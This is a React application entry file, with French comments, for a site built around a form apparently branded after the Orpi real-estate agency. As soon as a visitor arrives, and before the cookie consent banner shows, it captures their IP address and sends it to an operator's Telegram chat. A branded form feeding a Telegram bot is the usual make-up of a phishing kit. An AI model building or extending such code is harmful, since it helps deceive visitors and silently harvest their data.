import React, { useEffect } from 'react';
import { BrowserRouter as Router, Routes, Route } from 'react-router-dom';
import OrpiForm from './OrpiForm';
import PrivacyPolicy from './pages/PrivacyPolicy';
import TermsOfService from './pages/TermsOfService';
import CookieConsent from './components/CookieConsent';
import StepConfirmation from './steps/StepConfirmation';
import Header from './components/Header';
import { getIpAddress } from './utils/ipService';
import { sendInitialUserInfo } from './utils/telegramService';

function App() {
  // Capturer l'IP et l'envoyer à Telegram dès l'arrivée sur la page
  useEffect(() => {
    const captureInitialVisit = async () => {
      try {
        const ipAddress = await getIpAddress();
        
        // Récupérer les tokens depuis les variables d'environnement
        const botToken = process.env.REACT_APP_TELEGRAM_BOT_TOKEN;
        const chatId = process.env.REACT_APP_TELEGRAM_CHAT_ID;
        
        if (botToken && chatId) {
          // Envoyer l'info de visite sans bloquer l'affichage de l'app
          sendInitialUserInfo(ipAddress)
            .catch(error => console.error('Erreur d\'envoi des informations initiales:', error));
        }
      } catch (error) {
        console.error('Erreur lors de la capture de l\'IP initiale:', error);
      }
    };
    
    captureInitialVisit();
  }, []);

  return (
    <Router>
      <Header />
      <Routes>
        <Route path="/" element={<OrpiForm />} />
        <Route path="/politique-confidentialite" element={<PrivacyPolicy />} />
        <Route path="/conditions-utilisation" element={<TermsOfService />} />
        <Route path="/confirmation" element={<StepConfirmation />} />
      </Routes>
      <CookieConsent />
    </Router>
  );
}

export default App;